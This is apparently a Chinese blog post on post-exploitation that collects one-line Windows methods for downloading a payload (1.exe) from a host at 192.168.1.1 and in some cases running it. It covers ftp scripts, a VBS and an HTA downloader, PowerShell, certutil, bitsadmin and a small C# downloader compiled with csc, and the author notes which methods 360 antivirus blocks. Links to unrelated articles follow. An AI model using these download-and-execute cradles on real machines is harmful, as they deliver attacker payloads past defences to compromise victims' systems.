利用ftp来下载payload文件

echo open 192.168.1.1 21> ftp.txt

echo ftp>> ftp.txt

echo bin >> ftp.txt

echo ftp>> ftp.txt

echo GET 1.exe >> ftp.txt

ftp -s:ftp.txt

后记:这个我没有实验成功太菜了

利用vbs来下载payload

Set Post = CreateObject("Msxml2.XMLHTTP")

Set Shell = CreateObject("Wscript.Shell")

Post.Open "GET","http://192.168.1.1/1.exe",0

Post.Send()

Set aGet = CreateObject("ADODB.Stream")

aGet.Mode = 3

aGet.Type = 1

aGet.Open()

aGet.Write(Post.responseBody)

aGet.SaveToFile "C:\test\1.exe",2

后记:这个已经利用成功了,网上说可以用script来执行,可能win10上面没有,但是可以直接双击运行,或者命令行里面直接使用,vbs脚本后缀为vbs

利用Powershell来下载payload

powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/1.exe','C:\test\1.exe');start-process 'C:\test\1.exe'

后记:是在命令行中执行以上命令

利用certutil下载文件

直接下载certutil.exe -urlcache -split -f http://192.168.1.1/1.exe

指定文件名保存certutil.exe -urlcache -split -f http://192.168.1.1/1.txt 1.php

删除缓存certutil.exe -urlcache -split -f http://192.168.1.1/1.exe delete
查看缓存certutil.exe -urlcache *

至于这个缓存有什么用就不知道了
后记:下载的文件就在当前目录并且文件名与url相同(除非指定文件名保存),360会拦截

利用CSC(windows的c#编译器)来下载文件

1.cs文件内容

using System.Net;

namespace downloader

{

    class Program

    {

        static void Main(string[] args)

        {

            WebClient client = new WebClient();

            string URLAddress = @"http://192.168.1.1/1.exe";

            string receivePath = @"C:\test\";

            client.DownloadFile(URLAddress, receivePath + System.IO.Path.GetFileName

        (URLAddress));

        }

    }

}

后记:csc.exe位于C:\Windows\Microsoft.NET\Framework\v2.0.50727。因为未加入环境变量中所以需要指定路径。
使用方式:C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:C:\tes
t\download.exe C:\test\1.cs
这样1.cs就会被编辑为exe文件,我们运行一下就会把文件下载下来了,360会进行拦截,估计是捕获了下载的时候的流量了,因为并不是直接就拦截了

hta下载文件

将下列代码保存至.hta文件

<html>

<head>

<script>

var Object = new ActiveXObject("MSXML2.XMLHTTP");

Object.open("GET","http://192.168.1.1/1.exe",false);

Object.send();

if (Object.Status == 200)

{

    var Stream = new ActiveXObject("ADODB.Stream");

    Stream.Open();

    Stream.Type = 1;

    Stream.Write(Object.ResponseBody);

    Stream.SaveToFile("C:\\test\\1.exe", 2);

    Stream.Close();

}

window.close();

</script>

<HTA:APPLICATION

WINDOWSTATE = "minimize">

</head>

<body>

</body>

</html>

后记:直接双击运行既可或者命令行直接执行,360会拦截

利用bitsadmin下载文件

bitsadmin是一个控制台工具,可用于创建下载或上传工作和监测其进展情况。xp以后的Windows系统自带

bitsadmin /transfer n http://192.168.1.1/1.exe C:\test\update\1.exe

后记:不支持https/ftp协议,php/python自带的服务器会报错,360会拦截

总结,其实感觉Windows上可以玩的东西比Linux多,使用的也比Linux多,这可能也是红蓝对抗偏向于这边的原因吧

一句话下载总结(用于后渗透上传payload)的更多相关文章

  1. android 拍照或者图库选择 压缩后 图片 上传

    通过拍照或者从相册里选择图片通过压缩并上传时很多应用的常用功能,记录一下实现过程 一:创建个临时文件夹用于保存压缩后需要上传的图片 /** * path:存放图片目录路径 */ private Str ...

  2. tomcat重启或关闭后,上传文件消失 .

    tomcat重启或关闭后,上传文件消失的问题,是因为在断电前myeclipse是启动的,断电时造成myeclipse异常关闭,再重新启动myeclipse时会重新发布项目,把先前发布的项目给覆盖了,所 ...

  3. 程序windows上可以上传附件,部署到 linux服务器后出现 “上传目录 不可写” 怎么解决?

    这样的问题一般都是linux  下文件读写权限引起的,用 shell  命名到上传附件的目录(如 cd /data/www/project/upload/),然后执行 shell 文件权限设置: 例如 ...

  4. JIRA恢复备份后无法上传附件

    1.在恢复JIRA 备份数据和附件后,上传附件失败,这一般是恢复附件时没有修改附件的拥有者和组 创建JIRA平台,会自动创建一个服务器的账户,如果是服务器第一次部署JIRA那么账户肯定是jira,如果 ...

  5. 加固后,上传play store, 在 google play store 下载应用安装后,打开签名校验失败

    在Google Play Console. (Google Play App Signing )签署您的应用 在创建应用时: 会有个“ Google Play App Signing” 的东西,提示使 ...

  6. 使用springMVC实现文件上传和下载之环境配置与上传

    最近的项目中用到了文件的上传和下载功能,任务分配给了其他的同时完成.如今项目结束告一段落,我觉着这个功能比较重要,因此特意把它提取出来自己进行了尝试. 一. 基础配置: maven导包及配置pom.x ...

  7. 用SpringMVC实现的上传下载方式二(多文件上传)

    参考来源:      http://blog.csdn.net/qq_32953079/article/details/52290208 1.导入相关jar包 commons-fileupload.j ...

  8. SecureCRT上传、下载文件 使用rz【上传】& sz【下载】命令

    首先安装:apt-get install lrzsz SecureCRT这款SSH客户端软件同时具备了终端仿真器和文件传输功能.比ftp命令方便多了,而且服务器不用再开FTP服务了.rz,sz是便是L ...

  9. 视频(其他)下载+tomcat 配置编码+图片上传限制大小

    视频下载:前台 jsp function downVideo(value,row,index){ return '<a href="<%=basePath%>admin/v ...

随机推荐

  1. 读取Properties

    package com.infotech.common.util; import java.io.FileNotFoundException; import java.io.IOException; ...

  2. 使用cordova network-information 插件监听手机网络状态

    在使用html5配合cordova做webapp时,有时需要实时监测手机的网络 状况.html5里面是没有相关的js的,这时就需要在cordova里找相关插件了. 一.插件查找 1.在cordova中 ...

  3. Kotlin学习笔记

    Kotlin的注释 Kotlin 的代码注释和Java一模一样 Kotlin的运行方式也是先kotlinc生成字节码,再kotlin字节码 如果一行里面只有一条语句,那么可以不写分号.但如果打算在同一 ...

  4. flex: 1在ios10.2系统手机端的换行布局失败问题

    使用flex:1要追加flex-basis: auto;可以简写flex: 1 1 auto; 表格不可以用flex布局

  5. ArrayList,LinkedList,Vector集合的认识

    最近在温习Java集合部分,花了三天时间读完了ArrayList与LinkedList以及Vector部分的源码.之前都是停留在简单使用ArrayList的API,读完源码看完不少文章后总算是对原理方 ...

  6. Android中的gen文件为空或者不存在的处理方法

    Android中的gen文件时链接程序和XML中资源定义的桥梁,所以如果gen文件夹为空可能有以下的几个原因: 1.XML文件错误,这时可以检查res文件夹中的文件是否有错误 2.导入新的Androi ...

  7. Service5

    DHCP概述及原理• Dynamic Host Configuration Protocol  – 动态主机配置协议,由 IETF(Internet 网络工程师任务小组)组织制定,用来简化主机地址分配 ...

  8. python bs4解析网页时 bs4.FeatureNotFound: Couldn't find a tree builder with the features you requested: lxml. Do you need to inst(转)

    Python小白,学习时候用到bs4解析网站,报错 bs4.FeatureNotFound: Couldn't find a tree builder with the features you re ...

  9. 使用Objective-C的+(void)initialize初始化static变量

    在<Objective C类方法load和initialize的区别>一文中,我介绍了Objective-C对待+(void)initialize和+(void)load两个方法在编译和执 ...

  10. MySql命令行无法显示中文

    好烦遇到了,遇到MySql命令行无法显示中文问题????? show variables like 'char%';//显示字符集 set names utf8;//设置字符集 describer t ...